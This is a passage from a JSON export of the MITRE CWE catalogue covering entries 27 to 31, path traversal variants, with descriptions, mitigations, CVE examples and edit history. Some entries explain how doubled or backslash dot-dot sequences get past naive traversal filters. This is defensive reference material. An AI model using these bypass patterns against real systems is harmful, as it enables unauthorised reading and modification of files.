\'/directory/../filename\'","attr":{"@_Date":"2008-04-11"}}}},"27":{"attr":{"@_ID":"27","@_Name":"Path Traversal: \'dir/../../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'directory/../../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"../\\" sequence, so multiple \\"../\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"../\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'directory/../../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Directory Doubled Dot Dot Slash - \'directory/../../filename\'","attr":{"@_Date":"2008-04-11"}}}},"28":{"attr":{"@_ID":"28","@_Name":"Path Traversal: \'..\\\\filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"..\\\\\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'..\\\\\' manipulation is the canonical manipulation for operating systems that use \\"\\\\\\" as directory separators, such as Windows. However, it is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'..\\\\filename\' (\'dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Dot Dot Backslash - \'..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"29":{"attr":{"@_ID":"29","@_Name":"Path Traversal: \'\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-25, except using \\"\\\\\\" instead of \\"/\\". Sometimes a program checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check. It is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\..\\\\filename\' (\'leading dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Backslash - \'\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"30":{"attr":{"@_ID":"30","@_Name":"Path Traversal: \'\\\\dir\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\dir\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-26, except using \\"\\\\\\" instead of \\"/\\". The \'\\\\dir\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"7 - \'\\\\directory\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Backslash - \'\\\\directory\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"31":{"attr":{"@_ID":"31","@_Name":"Path Traversal: \'dir\\\\..\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'dir\\\\..\\\\..\\\\filename\' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'dir\\\\..\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"..\\\\\\" sequence, so multiple \\"..\\\\\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"..\\\\\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"8 - \'directory\\\\..\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"fixed incorrect manipulation in name (desc was correct)."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated 